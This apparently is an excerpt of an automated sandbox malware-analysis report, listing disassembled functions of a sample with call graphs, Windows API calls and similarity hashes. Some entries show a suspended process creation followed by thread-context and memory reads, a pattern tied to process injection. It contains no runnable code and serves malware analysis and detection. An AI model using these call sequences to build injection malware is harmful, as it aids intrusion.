                                                                                                        control_flow_graph 2876 79e82b-79e87c call 7a6139 2879 79e87e-79e884 2876->2879 2880 79e886-79e889 2876->2880 2883 79e8d3-79e8e5 2879->2883 2881 79e88b-79e88d 2880->2881 2882 79e88f-79e8a2 call 797e35 2880->2882 2881->2883 2892 79e8ae-79e8c7 call 7a6139 2882->2892 2893 79e8a4 2882->2893 2885 79e8f5 2883->2885 2886 79e8e7-79e8ea 2883->2886 2887 79e8fa-79e90f call 797c06 call 7896b0 2885->2887 2888 79e8f5 call 79e6d1 2885->2888 2886->2885 2890 79e8ec-79e8f3 call 79e430 2886->2890 2888->2887 2890->2887 2903 79e8c9-79e8ca 2892->2903 2904 79e8cc-79e8cd call 797c06 2892->2904 2898 79e8a5-79e8ac call 797c06 2893->2898 2906 79e8d2 2898->2906 2903->2898 2904->2906 2906->2883
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 0079E8FB
                                                                                                          • Part of subcall function 0079E6D1: _free.LIBCMT ref: 0079E731
                                                                                                          • Part of subcall function 0079E6D1: GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0079E8F2,?,?,00000000), ref: 0079E743
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$InformationTimeZone
                                                                                                        • String ID: M{
                                                                                                        • API String ID: 597776487-1158415886
                                                                                                        • Opcode ID: cca28786db355c5449d0a9b4807be69c8fd1fede2f728e1d4806077a492611fd
                                                                                                        • Instruction ID: 06ec34a4072751c2e784629154dde1cf40a8ababdbe29a750df4a4fcaf9a29bd
                                                                                                        • Opcode Fuzzy Hash: cca28786db355c5449d0a9b4807be69c8fd1fede2f728e1d4806077a492611fd
                                                                                                        • Instruction Fuzzy Hash: 8F21F972800319D6CF24EBB4AC4EDAB777C9B81364F241669F565A3142FE389D8087A0
                                                                                                        Function 00780AA0 Relevance: 6.0, APIs: 4, Instructions: 37threadsleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 0076C6D0: Sleep.KERNELBASE(00000064), ref: 0076C6D3
                                                                                                          • Part of subcall function 0076C6D0: CreateMutexA.KERNELBASE(00000000,00000000,007C6494), ref: 0076C6F1
                                                                                                          • Part of subcall function 0076C6D0: GetLastError.KERNEL32 ref: 0076C6F9
                                                                                                          • Part of subcall function 0076C6D0: GetLastError.KERNEL32 ref: 0076C70A
                                                                                                          • Part of subcall function 0077F060: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0077F142
                                                                                                          • Part of subcall function 0077F060: RegCloseKey.KERNELBASE(80000002), ref: 0077F158
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 007667BD
                                                                                                          • Part of subcall function 007661F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00766894
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000208A0,00000000,00000000,00000000), ref: 00780A66
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00020930,00000000,00000000,00000000), ref: 00780A77
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000209C0,00000000,00000000,00000000), ref: 00780A88
                                                                                                        • Sleep.KERNELBASE(00007530), ref: 00780A95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create$Thread$ErrorLastOpenSleep$CloseInfoMutexQuery
                                                                                                        • String ID:
                                                                                                        • API String ID: 2192108483-0
                                                                                                        • Opcode ID: 8bed0f823e0bef338f6f65cb9e9317e7108e6ea85b00167aefe8dddd2731cafc
                                                                                                        • Instruction ID: 58e6c3b9809cf36a6dd16ab2e8fc10ba700dcb244b1b172d11bc4b506aa1d176
                                                                                                        • Opcode Fuzzy Hash: 8bed0f823e0bef338f6f65cb9e9317e7108e6ea85b00167aefe8dddd2731cafc
                                                                                                        • Instruction Fuzzy Hash: 44F0CA71BD8728B6F5B132E84C0BF5A29045B04FA0F708112B75A7E1D258CC35488BEF
                                                                                                        Function 007900B4 Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3825 7900b4-7900c0 3826 7900df-790103 call 78b340 3825->3826 3827 7900c2-7900de call 790c5f call 790c72 call 78ea28 3825->3827 3833 790121-790143 CreateFileW 3826->3833 3834 790105-79011f call 790c5f call 790c72 call 78ea28 3826->3834 3835 790153-79015a call 790192 3833->3835 3836 790145-790149 call 79021c 3833->3836 3857 79018d-790191 3834->3857 3847 79015b-79015d 3835->3847 3843 79014e-790151 3836->3843 3843->3847 3849 79017f-790182 3847->3849 3850 79015f-79017c call 78b340 3847->3850 3853 79018b 3849->3853 3854 790184-790185 CloseHandle 3849->3854 3850->3849 3853->3857 3854->3853
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 07156d673e179a56c3e280b8f2848f1683cfb97b46cd824d3b52eec47ce70de4
                                                                                                        • Instruction ID: 81b6e96bf0ae0ac16aceb6c50fd3f00dd08b3caaafb142a52f4dd9dd90961fb1
                                                                                                        • Opcode Fuzzy Hash: 07156d673e179a56c3e280b8f2848f1683cfb97b46cd824d3b52eec47ce70de4
                                                                                                        • Instruction Fuzzy Hash: 0721743195120CBEEF117B68AC4ABAE3729AF42774F204315F9243B2D1D7785E0597E1
                                                                                                        Function 0079038C Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3858 79038c-7903a2 3859 7903b2-7903c2 FileTimeToSystemTime 3858->3859 3860 7903a4-7903a8 3858->3860 3862 790402-790405 3859->3862 3863 7903c4-7903d6 SystemTimeToTzSpecificLocalTime 3859->3863 3860->3859 3861 7903aa-7903b0 3860->3861 3864 790407-790412 call 7896b0 3861->3864 3862->3864 3863->3862 3865 7903d8-7903f8 call 790413 3863->3865 3868 7903fd-790400 3865->3868 3868->3864
                                                                                                        APIs
                                                                                                        • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,007902C3,?,?,00000000,00000000), ref: 007903BA
                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,007902C3,?,?,00000000,00000000), ref: 007903CE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                        • String ID:
                                                                                                        • API String ID: 1707611234-0
                                                                                                        • Opcode ID: ff165a1b026abf800ea81e02941ef03e20dc1b4a5ba4ead3e831a8f9d9c6f27b
                                                                                                        • Instruction ID: 60356c707d031126fb495060b40f2fea8ebf79a0925a22ebc0bacb1017a65c2d
                                                                                                        • Opcode Fuzzy Hash: ff165a1b026abf800ea81e02941ef03e20dc1b4a5ba4ead3e831a8f9d9c6f27b
                                                                                                        • Instruction Fuzzy Hash: B111D67290020CEFCF10DF95D989EDF77BCAB08310F544266E616E6191EA38EA45CBA1
                                                                                                        Function 0076B250 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3914 76b250-76b2dc GetComputerNameExW 3915 76b2e0-76b2e9 3914->3915 3915->3915 3916 76b2eb-76b2f2 3915->3916 3917 76b2f4-76b323 call 78adc0 3916->3917 3918 76b325-76b32b 3916->3918 3927 76b395-76b3f7 call 782d00 3917->3927 3920 76b331-76b33c 3918->3920 3921 76b4ab call 7626a0 3918->3921 3924 76b345-76b34c 3920->3924 3925 76b33e-76b343 3920->3925 3926 76b4b0-76b4b5 call 78ea38 3921->3926 3928 76b34f-76b38f call 7853d0 call 78adc0 3924->3928 3925->3928 3936 76b451-76b45a 3927->3936 3937 76b3f9 3927->3937 3928->3927 3940 76b45c-76b471 3936->3940 3941 76b48d-76b4aa call 7896b0 3936->3941 3939 76b400-76b41d 3937->3939 3948 76b421-76b44f 3939->3948 3949 76b41f 3939->3949 3944 76b483-76b48a call 789d26 3940->3944 3945 76b473-76b481 3940->3945 3944->3941 3945->3926 3945->3944 3948->3936 3948->3939 3949->3948
                                                                                                        APIs
                                                                                                        • GetComputerNameExW.KERNEL32(00000002,?,?,3F07E9DB,74DF0F00), ref: 0076B2A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ComputerName
                                                                                                        • String ID:
                                                                                                        • API String ID: 3545744682-0
                                                                                                        • Opcode ID: ce8ca879f83932c4413636ad3e2807dbea4fde8bc35f240872e2c28e1b4f70f8
                                                                                                        • Instruction ID: 474b6e49deac9c242d0529005e5259a8b4af02f2d6b7ae7c76e997f486b85136
                                                                                                        • Opcode Fuzzy Hash: ce8ca879f83932c4413636ad3e2807dbea4fde8bc35f240872e2c28e1b4f70f8
                                                                                                        • Instruction Fuzzy Hash: 8F518071A012289BCB20EF64DC887DDBBB4EB59310F5002D9D81AE7651DB78AAC4CF91
                                                                                                        Function 00799B8F Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3952 799b8f-799b9c call 79a21a 3954 799ba1-799bac 3952->3954 3955 799bae-799bb0 3954->3955 3956 799bb2-799bba 3954->3956 3957 799bfd-799c09 call 797c06 3955->3957 3956->3957 3958 799bbc-799bc0 3956->3958 3959 799bc2-799bf7 call 7984a9 3958->3959 3964 799bf9-799bfc 3959->3964 3964->3957
                                                                                                        APIs
                                                                                                          • Part of subcall function 0079A21A: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007969C2,00000001,00000364,00000006,000000FF,?,?,00789ABF,007808E7,?,007830BE,8B18EC84), ref: 0079A25B
                                                                                                        • _free.LIBCMT ref: 00799BFE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 614378929-0
                                                                                                        • Opcode ID: 112299dda7d8a3aaa9a6c67e080750ada0fe037732b09379cacda0bf255602f7
                                                                                                        • Instruction ID: f7352eb18cd9e1dc00fdc12c83a3e1046b8a97be4d31d87a7849ca2317211ae8
                                                                                                        • Opcode Fuzzy Hash: 112299dda7d8a3aaa9a6c67e080750ada0fe037732b09379cacda0bf255602f7
                                                                                                        • Instruction Fuzzy Hash: 6B0189B2600316ABDB20CF68E885989FB98FB053B0F04022DE645A72C0E374AC00C7E0
                                                                                                        Function 00790042 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 7bc9da4f6f1252227d049f80858ae70662f139471ec9298f73f7a1d479842fa2
                                                                                                        • Instruction ID: 13ae502097b99728661b4c6c0d14212eb9d45e5f6363257cbd891684915ff845
                                                                                                        • Opcode Fuzzy Hash: 7bc9da4f6f1252227d049f80858ae70662f139471ec9298f73f7a1d479842fa2
                                                                                                        • Instruction Fuzzy Hash: E9018F72D14218EECF11AFA8EC067AE7FF4AF04320F244166F918E21D1EA748A50D7D1
                                                                                                        Function 0079A21A Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007969C2,00000001,00000364,00000006,000000FF,?,?,00789ABF,007808E7,?,007830BE,8B18EC84), ref: 0079A25B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 1070f7590079bb6acabe9d8615573136ad93b6195150637224f664f4bea787f7
                                                                                                        • Instruction ID: 00dd319513b7e6de904256e1a3f1938e1d6a9b8b2af2970fa9040496df2f40d0
                                                                                                        • Opcode Fuzzy Hash: 1070f7590079bb6acabe9d8615573136ad93b6195150637224f664f4bea787f7
                                                                                                        • Instruction Fuzzy Hash: D0F0B431647524BBDF211B21BC09A6A3748BFC2760B148122A8449A190CE3EDD0086E2
                                                                                                        Function 007808A0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                          • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                        • Sleep.KERNELBASE ref: 00780925
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQuerySleepValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 4119054056-0
                                                                                                        • Opcode ID: 3904c7ce105df17420ec73244a6180c1839e59e3e4019c3ef55ba879c0d038f5
                                                                                                        • Instruction ID: 56f4d4261de918a4527a08459959334891f4e6d6883a3912d9ac87f18d9637a4
                                                                                                        • Opcode Fuzzy Hash: 3904c7ce105df17420ec73244a6180c1839e59e3e4019c3ef55ba879c0d038f5
                                                                                                        • Instruction Fuzzy Hash: 21F0D1B1A40644EBC700BBAC8D1BB0E7BA4AB06B60F94435CE821272D2DA7D2A0447D2
                                                                                                        Function 00780930 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                          • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                        • Sleep.KERNELBASE ref: 007809B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQuerySleepValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 4119054056-0
                                                                                                        • Opcode ID: 0e062e35fba1f899dda147856f87ad3ce3c1ec17bb9bf2d62c274d60d586d07c
                                                                                                        • Instruction ID: 13211acb685b09b055f3bf7c2ed8adbae129c7df20dc33ceccc69e0c52d1128b
                                                                                                        • Opcode Fuzzy Hash: 0e062e35fba1f899dda147856f87ad3ce3c1ec17bb9bf2d62c274d60d586d07c
                                                                                                        • Instruction Fuzzy Hash: F3F0F9B1A40604EBC7007B6CCD17B0E7BA5EB06B60F94435CE821672D2DB7D2A1447D2
                                                                                                        Function 007809C0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                          • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                        • Sleep.KERNELBASE ref: 00780A45
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQuerySleepValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 4119054056-0
                                                                                                        • Opcode ID: e5ee62d8f2c17bd6d4f116a1cb2418da5886c8d264d891a7b0c1c74a96143f64
                                                                                                        • Instruction ID: 8f96db2777d92c56fffec75d73f214336af8e716676268cb8efd0bd5a81a6326
                                                                                                        • Opcode Fuzzy Hash: e5ee62d8f2c17bd6d4f116a1cb2418da5886c8d264d891a7b0c1c74a96143f64
                                                                                                        • Instruction Fuzzy Hash: DDF0F971A40604EBC7007B7CCD17B0E7BA4EB06B60F94435CE821172D2DB7D2A0447D2

                                                                                                        Non-executed Functions

                                                                                                        Function 007D8A00 Relevance: 38.6, Strings: 21, Instructions: 12391COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $($($($($($($($8$8$8$>$`$g$g$g$g$z$z$z
                                                                                                        • API String ID: 0-3464496334
                                                                                                        • Opcode ID: 66f1bed81b99a069a37328925cb6e241153ac655f197810316540cb67f6a7d35
                                                                                                        • Instruction ID: 5b4fda8a050f735a9a38edb0e9feec90f79ddcd0550e281098827d74f31cd065
                                                                                                        • Opcode Fuzzy Hash: 66f1bed81b99a069a37328925cb6e241153ac655f197810316540cb67f6a7d35
                                                                                                        • Instruction Fuzzy Hash: 3254F2B1E013298FDB64CF29CD94B99BBB5BB4A314F1540EAD40AE7A41D7749E80CF42
                                                                                                        Function 00767EB0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184processmemorythreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00791803: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00767EE2,00000000,3F07E9DB), ref: 00791816
                                                                                                          • Part of subcall function 00791803: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00791847
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0076809D
                                                                                                        • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 007680FB
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00768114
                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00768129
                                                                                                        • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00768149
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
